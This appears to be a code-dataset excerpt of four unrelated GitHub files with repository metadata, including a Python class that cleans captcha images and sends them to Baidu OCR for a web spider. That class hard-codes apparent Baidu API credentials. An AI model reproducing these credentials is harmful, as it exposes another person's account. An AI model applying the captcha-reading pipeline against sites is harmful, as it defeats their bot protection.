e2e8ea110fb7113babc05ea998d5e8b5d26b5b25 | bb71682eb72b8f9a94a1c4c637f8d07e5239d63b | /Study/ITP1_2_C.py | c7415ebb0177ae742394b0783e6942adf34e08bf | [] | no_license | mao12312/AtCoder | 42d090c9dc48dbbe3ff0143b3946f76013704430 | f6db9b526612a37b1867e468dcec3aa84683786e | refs/heads/master | 2022-12-09T04:09:25.513094 | 2020-09-09T14:18:21 | 2020-09-09T14:18:21 | 259,569,529 | 0 | 0 | null | 2020-05-04T08:11:53 | 2020-04-28T07:55:11 | Python | UTF-8 | Python | false | false | 82 | py | nums = list(map(int,input().split()))
nums.sort()
print(nums[0], nums[1], nums[2]) | [
"42489486+mao12312@users.noreply.github.com"
] | 42489486+mao12312@users.noreply.github.com |
4f124bdf2b94619bb4c7de233059c280e56995a2 | 06ce40aa98c04ae61ce9a819a30f39202daca03b | /app/utils/file.py | 89e202eb654668770b2d1c6e2bbab7d28a9f7e08 | [] | no_license | sjquant/engster-server | 85d87a1f62c21830c460cb9076a24f236f3b1ea8 | d1d10c03326b9ca4b6db93ead7f85cf65b5ca9f4 | refs/heads/master | 2022-06-18T20:24:55.147620 | 2022-06-08T02:07:37 | 2022-06-08T02:07:37 | 163,208,699 | 3 | 0 | null | 2022-06-08T02:07:39 | 2018-12-26T18:54:19 | Python | UTF-8 | Python | false | false | 173 | py | def get_file_url(path: str, *, file_host: str = "127.0.0.1"):
    # Absolute URLs (and falsy paths: None / "") pass through untouched.
    if not path or path.startswith("http"):
        return path
    else:
        # Relative storage paths are prefixed with the file host.
        return f"{file_host}/{path}"
| [
"noreply@github.com"
] | noreply@github.com |
d3ebe3bd1b50178b1770182a771ae09b385c8aa0 | abae77a818c8aeff722cd3d9347b1a45ee8f783b | /spider_day1/spiders/Ocr.py | c39b9abd4340d9c697445c483453c91f5273af23 | [] | no_license | xiaoxiwu/spider | 4880beda7fff2f43a99ef0e9092a56a3974c54dc | 1ca87091b475bd19afc9673db575e6c23bdd626e | refs/heads/master | 2021-05-12T19:48:55.747679 | 2018-01-14T13:54:48 | 2018-01-14T13:54:48 | 117,100,460 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,881 | py | # -*- coding: utf-8 -*-
from aip import AipOcr
from PIL import Image
class PythonOcr(object):
    """Captcha OCR via the Baidu AIP accurate-text API.

    Pipeline: binarize the image (preConcert), optionally denoise
    (remove_noise), save a temporary copy, and send it to Baidu for
    recognition.  Python 2 era code (see the `print` statement in
    ``__main__``).
    """

    # Baidu AIP credentials.
    # NOTE(review): hard-coded API credentials — should live in config/env.
    AppID = "10689156"
    APIKey = "2Vj4t2VfgVGRnnHCTWvRhprR"
    SecretKey = "PoVonzeGr7O1rD4fOAA7nx0gF1pF1EzA"
    AppName = "pythonOcr"
    # RGB constants used during binarization.
    WHITE = (255, 255, 255)
    BLACK = (0, 0, 0)

    def readImgFile(self, imgPath):
        """Return the raw bytes of the image at *imgPath*."""
        with open(imgPath, 'rb') as fp:
            return fp.read()

    def ocrChar(self, imgPath):
        """Send the image to Baidu's high-accuracy OCR and return the raw
        JSON-like response dict."""
        # Raw image bytes for the API call.
        image = self.readImgFile(imgPath)
        client = AipOcr(self.AppID, self.APIKey, self.SecretKey)
        return client.basicAccurate(image)

    def preConcert(self, img):  # pre-process: binarize the image in place
        """Threshold every pixel: anything brighter than `threshold` in any
        channel becomes white, the rest black.  (Method name is presumably a
        typo for "preConvert"; kept for API compatibility.)  Assumes an RGB
        image — an RGBA source would break the 3-way unpack below."""
        width, height = img.size
        threshold = 30
        for i in range(0, width):
            for j in range(0, height):
                p = img.getpixel((i, j))  # read this pixel's channels
                r, g, b = p
                if r > threshold or g > threshold or b > threshold:
                    img.putpixel((i, j), self.WHITE)
                else:
                    img.putpixel((i, j), self.BLACK)
        # img.show()
        # img.save("preFig.jpg")
        return img

    def remove_noise(self, img, window=1):  # median-filter speckles from the binarized image
        """Median filter over a cross (window=1) or 3x3 (window=2)
        neighborhood; pixels whose neighborhood majority is black become
        black, otherwise white.  Also writes a debug copy to
        "mov_noise_fig.jpg"."""
        if window == 1:
            # 4-connected cross plus the center pixel.
            window_x = [1, 0, 0, -1, 0]
            window_y = [0, 1, 0, 0, -1]
        elif window == 2:
            # Full 3x3 neighborhood.
            window_x = [-1, 0, 1, -1, 0, 1, 1, -1, 0]
            window_y = [-1, -1, -1, 1, 1, 1, 0, 0, 0]
        width, height = img.size
        for i in range(width):
            for j in range(height):
                box = []
                for k in range(len(window_x)):
                    d_x = i + window_x[k]
                    d_y = j + window_y[k]
                    try:
                        d_point = img.getpixel((d_x, d_y))
                        if d_point == self.BLACK:
                            box.append(1)
                        else:
                            box.append(0)
                    except IndexError:
                        # Neighbor outside the image: treat the border pixel
                        # as background.
                        img.putpixel((i, j), self.WHITE)
                        continue
                box.sort()
                # Only pixels with a complete neighborhood get the median vote.
                if len(box) == len(window_x):
                    mid = box[int(len(box) / 2)]
                    if mid == 1:
                        img.putpixel((i, j), self.BLACK)
                    else:
                        img.putpixel((i, j), self.WHITE)
        img.save("mov_noise_fig.jpg")
        return img

    def ocrImg(self, orignalImg, tmpImg):
        """Binarize *orignalImg*, save it to *tmpImg*, OCR it, and return
        (first recognized line, processed PIL image)."""
        img = Image.open(orignalImg)
        img = self.preConcert(img)
        img.save(tmpImg)
        result = self.ocrChar(tmpImg)
        words = result['words_result']
        return words[0]['words'], img
if __name__ == '__main__':
    ocr = PythonOcr()
    originalPtah = 'captcha.jpeg'  # (sic) path of the captcha to recognize
    tmpPath = 'preFile.jpg'  # where the binarized copy is written
    # Python 2 print statement: shows the (text, Image) tuple from ocrImg().
    print ocr.ocrImg(originalPtah, tmpPath)
| [
"xiaoxiwu2008@qq.com"
] | xiaoxiwu2008@qq.com |
b403abe996e3eb4e3e8eadc3a538e7f4a7a5bb92 | e68734297f9321c0f934daa629bea21eafbb15a3 | /stubs/homeassistant/util/color.pyi | 5a7cb0197527cf37ddbd1afb7ab5d517a71e012f | [
"MIT"
] | permissive | Phara0h/hacs-hubitat | 1dc7ef978d5c552ab930992e00a6ae6d1a01a102 | e87107490c0d7004e3b9f1296a372b8a280aabec | refs/heads/master | 2022-12-08T18:33:28.854871 | 2020-09-18T22:40:29 | 2020-09-18T22:40:29 | 296,737,546 | 0 | 0 | MIT | 2020-09-18T21:57:26 | 2020-09-18T21:57:25 | null | UTF-8 | Python | false | false | 123 | pyi | def color_temperature_kelvin_to_mired(temp: int) -> int: ...
def color_temperature_mired_to_kelvin(mired: int) -> int: ...
| [
"jason@jasoncheatham.com"
] | jason@jasoncheatham.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.